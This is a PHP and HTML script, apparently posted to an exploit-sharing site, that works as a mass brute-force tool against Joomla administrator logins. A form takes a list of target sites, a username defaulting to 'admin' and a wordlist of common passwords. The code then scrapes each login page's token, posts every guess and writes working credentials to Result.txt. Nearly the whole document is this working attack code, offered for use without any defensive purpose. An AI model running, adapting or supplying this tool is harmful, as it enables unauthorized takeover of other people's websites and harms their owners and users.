Joomla Brute Attack PHP Script

1.  
2. __ __ _ _ _ ___
3. \ \/ /_ __ | | ___ (_) |_ ___ _ __ ___ / __\ __ _____ __
4. \ /| '_ \| |/ _ \| | __/ _ \ '__/ __| / / | '__/ _ \ \ /\ / /
5. / \| |_) | | (_) | | || __/ | \__ \ / /__| | | __/\ V V /
6. /_/\_\ .__/|_|\___/|_|\__\___|_| |___/ \____/_| \___| \_/\_/
7. |_|
8.  
9.  
10.  
11. <html>
12. <head>
13. <link href="http://i.imgur.com/jKy0y.jpg" type="image/x-icon" rel="shortcut icon" />
14. <meta name="author" content="RetnOHacK" />
15. <meta name="keywords" content="Joomla, Bruter, JoomlaBruter, JoomlaBruterForce, JoomlaBruterForceOnline" />
16. <meta name="description" content="RetnOHacK #Procoder'z Team Albanian" />
17. <title>./Joomla Bruter Force</title>
18.  
19. <style type='text/css'>
20. input[type=submit], input[type=button], input[type=reset]{
21. text-align:center;
22. background:url(http://i46.tinypic.com/aloifo.png) repeat-x center bottom #666666;
23. border:1px solid #4D4D4D;
24. color:#FFFFFF;
25. border-top-color:#565656;
26. padding:4px 6px;
27. margin:4px 5px;
28. height:16px;
29. -moz-box-shadow:0 0 1px black;
30. -webkit-box-shadow:0 0 1px black;
31. box-shadow:0 0 1px black;
32. text-shadow:0 1px black;
33. -moz-border-radius:4px;
34. -webkit-border-radius:4px;
35. -khtml-border-radius:4px;
36. border-radius:4px;
37. height:23px;
38. }
39.  
40.  
41. input[type=text], input[type=password]{
42. background:url) repeat-x center bottom #666666;
43. border:1px solid #4D4D4D;
44. color:#CCCCCC;
45. border-top-color:#565656;
46. -moz-box-shadow:0 0 1px black;
47. -webkit-box-shadow:0 0 1px black;
48. box-shadow:0 0 1px black;
49. -moz-border-radius:4px;
50. -webkit-border-radius:4px;
51. -khtml-border-radius:4px;
52. border-radius:4px;
53. height:18px;
54. margin-left: 5px;
55. }
56. input , textarea , button , body , caption , table ,area , option {
57. outline:none;
58. transition: all 0.20s ease-in-out;
59. -webkit-transition: all 0.25s ease-in-out;
60. -moz-transition: all 0.25s ease-in-out;
61. border-radius:3px;
62. -webkit-border-radius:3px;
63. -moz-border-radius:3px;
64. //border:1px solid rgba(0,0,0, 0.2);
65. /* font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif; */
66. }
67. input , textarea {
68. background: url('') repeat scroll 0 0 #8B8B8B;';
69. }
70.  
71.  
72.  
73.  
74. body{
75. /* font-family : Verdana; */
76. color : #FFFFFF;
77. font-size : 14px;
78. font-family:tahoma;
79. background: url() no-repeat center top #252525;
80. }
81. input , textarea {
82. outline:none;
83. transition: all 0.20s ease-in-out;
84. -webkit-transition: all 0.25s ease-in-out;
85. -moz-transition: all 0.25s ease-in-out;
86. border-radius:3px;
87. -webkit-border-radius:3px;
88. -moz-border-radius:3px;
89. border:1px solid rgba(0,0,0, 0.2);
90. }
91. input:focus, textarea:focus {
92. outline: 0;
93. border-color: rgba(82, 168, 236, 0.8);
94. -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
95. -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
96. box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
97.  
98.  
99. background: url('') repeat scroll 0 0 #8B8B8B;';
100. overflow: auto;
101.  
102. }
103. .x1 {}
104. .x2 {font-size:13px;
105. background-color:green;
106. color:black;}
107. hr {color:white;}
108. a {color:black;}
109. #x5 {
110. font-family:tahoma;}
111. .d1 {color :#29b01a;
112. font-family:tahoma;
113. font-size:13px;
114. font-weight:bold;}
115. #d4 {color:#29b01a;
116. font-family:tahoma;
117. font-weight:bold;}
118. </style>
119. </head>
120. </br></br>
121. <center><b><font color="lime">./Joomla Bruter Force</font></b><br /><br /><br />
122. <form method="post" action="" enctype="multipart/form-data">
123. <table width="50%" border="0">
124. <tr><td><p ><font class="d1">User :</font>
125. <input type="text" name="usr" value='admin' size="15"> </font><br /><br /></p>
126. </td></tr>
127. <tr><td><font class="d1">Sites list :</font>
128. </td><td><font class="d1" >Pass list :</font></td></tr>
129. <tr>
130. <td>
131. <textarea name="sites" cols="40" rows="13" ></textarea>
132. </td><td>
133. <textarea name="w0rds" cols="20" rows="13" >
134. admin
135. 123456
136. password
137. 102030
138. 123123
139. 12345
140. 123456789
141. pass
142. test
143. admin123
144. demo
145. !@#$%^
146. </textarea>
147. </td></tr><tr><td>
148. <font >
149. <input type="submit" name="x" value="start" id="d4">
150. </font></td></tr></table>
151. </form></center>
152. <?
153. @set_time_limit(0);
154.  
155. if($_POST['x']){
156.  
157. echo "<hr>";
158.  
159. $sites = explode("\n",$_POST["sites"]); // Get Sites
160. $w0rds = explode("\n",$_POST["w0rds"]); // Get w0rdLiSt
161.  
162. $Attack = new Joomla_brute_Force(); // Active Class
163.  
164.  
165. foreach($w0rds as $pwd){
166.  
167. foreach($sites as $site){
168.  
169.  
170. $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
171. flush();flush();
172.  
173. }
174.  
175. }
176.  
177. }
178.  
179.  
180. # Class & Function'z
181.  
182. function txt_cln($value){ return str_replace(array("\n","\r"),"",$value); }
183.  
184. class Joomla_brute_Force{
185.  
186. public function check_it($site,$user,$pass){ // print result
187.  
188. if(eregi('com_config',$this->post($site,$user,$pass))){
189.  
190. echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/administrator/index.php'>$site/administrator/index.php</a></b></span><BR>";
191. $f = fopen("Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/administrator/index.php\n"); fclose($f);
192. flush();
193. }else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();}
194.  
195. }
196.  
197. public function post($site,$user,$pass){ // Post -> user & pass
198.  
199. $token = $this->extract_token($site);
200.  
201. $curl=curl_init();
202.  
203. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
204. curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
205. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
206. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
207. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
208. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
209. curl_setopt($curl,CURLOPT_POST,1);
210. curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'&passwd='.$pass.'&lang=en-GB&option=com_login&task=login&'.$token.'=1');
211. curl_setopt($curl,CURLOPT_TIMEOUT,20);
212.  
213. $exec=curl_exec($curl);
214. curl_close($curl);
215. return $exec;
216.  
217. }
218.  
219. public function extract_token($site){ // get token from source for -> function post
220.  
221. $source = $this->get_source($site);
222.  
223. preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);
224.  
225. return $token[1][0];
226.  
227. }
228.  
229. public function get_source($site){ // get source for -> function extract_token
230.  
231. $curl=curl_init();
232. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
233. curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
234. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
235. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
236. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
237. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
238. curl_setopt($curl,CURLOPT_TIMEOUT,20);
239.  
240. $exec=curl_exec($curl);
241. curl_close($curl);
242. return $exec;
243.  
244. }
245.  
246. }
247. ?>